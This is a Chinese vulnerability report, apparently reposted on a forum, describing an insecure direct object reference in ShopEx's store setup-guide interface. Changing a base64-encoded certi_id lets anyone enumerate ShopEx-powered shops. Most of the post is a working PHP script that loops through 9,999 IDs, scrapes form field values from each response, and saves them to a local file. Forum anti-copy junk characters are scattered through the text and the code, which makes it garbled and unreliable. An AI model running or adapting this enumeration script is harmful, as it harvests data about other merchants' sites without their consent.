|
简要描述: o4 \ N# I9 N7 S$ L
ShopEx某接口缺陷,可遍历所有网站
; @9 n3 U% B v. t+ G1 G详细说明:! `! g6 V( M7 x1 y2 l1 v- i
问题出现在shopex 网店使用向导页面 / S) H3 X) y# Q1 \) ~' e& q' O" z1 U
3 V7 [7 z! r3 f q
$ e- P5 h* q% q6 s9 p2 Z
# |) c5 c2 f. I( Z" x$ ihttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=% ]$ M: q' H5 }5 G! G* S5 e4 l
6 t3 j7 ~" Z: ?& l) F" o
* T# c# h! C6 ^+ H
7 k7 v4 F. }, h$ P1 Mrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
# y) L1 P7 V4 [9 k+ t: Y
x" M5 V) q, p( u$ m+ x5 g1 J
, \8 `2 r. d* A
: S. L% F7 c4 z- x C我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
# t! B1 V. t* W6 B
5 {# |1 ]+ p* [8 W H" O
- J5 P$ o- y: O) i* K, G0 ?9 t. Q G! C( }1 `6 g4 a
<?php
4 R% B* r$ c B2 a) y1 L6 o$ Y
3 h% z3 V+ }8 Y8 ? for ($i=1; $i < 10000; $i++) { //遍历
3 i9 Q" b" F0 g$ z/ z6 p7 p3 n' ?# G( D+ i5 n) }' |! Y
ShowshopExD($i);3 O! [0 ^$ i. v! H7 C I
( g8 q1 D9 ~' s1 I+ S
}" o# y0 l6 U- T" W6 b2 [: f
: y: | q" f0 T2 O- b. C function ShowshopExD($cid) {6 F4 P F7 x0 H. q" J# s
$ q2 [0 o1 V: c" H1 j
$url='http://guide.ecos.shopex.cn/step2.php';
+ r4 a8 w' n; ~/ \3 x5 e' B+ ~' t7 D* r
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
9 a9 X* B5 h7 x2 q
) z2 f! S( U# p/ U5 }: G $url = $url.'?refer='.$refer;* w Z# I: D2 D3 k) |2 K) Q8 g
$ W. K! A* ?$ i1 [9 m
$ch = curl_init($url);% z- ~& \4 x* K. K% T
* N4 y! V/ L) E2 a curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
1 w8 z6 R6 w) P: k0 T" r
4 b: M, w: u- m& ^0 a w- _ curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
" }+ ?, _/ O* m8 W+ Z/ Q6 I. D6 _1 G5 v
$result = curl_exec($ch);' q2 s8 b& y. `1 J' w4 J) p$ _
8 x8 y, c" l1 g5 m
$result = mb_convert_encoding($result, "gb2312", "UTF-8");, Z7 d* o! e4 R) s
* j' p3 L: R3 P5 j/ U3 G
if(strpos($result,$refer))& j( z# E& R2 x. I: ?: ] M
* ?( A- H5 H! ~* a {
' c/ `9 {0 i* l2 r2 x9 b* k6 d6 N4 M3 O- c" J1 l+ V
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件2 s/ P+ _" K- K4 W+ ?
4 a# `9 d( u% P
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);! W S O5 O# {% m( g% @, c7 k3 t
8 B3 f6 Y/ l9 S- D" t# {0 e; l( g
foreach ($value[1] as $key) {. U, ?: p1 u9 h) }# @8 y4 |
8 g3 Z) x6 u2 W+ v$ X1 {4 } preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);- c6 b9 s2 M4 R* B
- w% W, y* R: `/ E q
echo $res[1][0].':'.$res[3][0]."\r\n";
7 ]- }; R: W# L: c0 |* Z* j4 ?) Y; l* K5 W( j
$col =$res[1][0].':'.$res[3][0]."\r\n";
7 T* L$ o+ t' J# {0 y/ i8 g- @. O- w+ o1 O3 l
fwrite($fp, $col, strlen($col));
0 l! x3 M* w, @$ D: B9 o1 M u" Q% h. R4 [& d5 y: R
}5 s! X# S- x' J( K2 {+ }
: w& A6 I, b- @, ]& I echo '--------------------------------'."\r\n";0 I# r/ o, Q$ j& A
4 M( g* _) a8 y- {8 c
fclose($fp); 1 H" D- e# q( b; q2 r
" Q' N+ p r! E- B" }1 I, ?+ G' o }. V4 X+ f2 z% y7 Q! \
3 c4 r' L# _* X flush();
G0 y! }& k& y4 w0 P1 S
% }9 K' }8 i" k' f6 p. a2 N curl_close($ch);
3 I+ d+ n0 u! \0 B$ s4 A. E1 S" u& a3 s% s4 v! _
}
# ?8 ?/ r' b4 M {1 p5 @; W
& h- ]6 c: v9 o1 V( c; J6 D% g9 p: e?>
3 N, X8 B2 ^/ g* h: f% {漏洞证明:3 ?2 [1 e- C# f6 m
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg& d8 H2 x) L3 U
refer换成其他加密方式& W- k$ F# P4 t. }8 x8 `( |5 b. y
|
|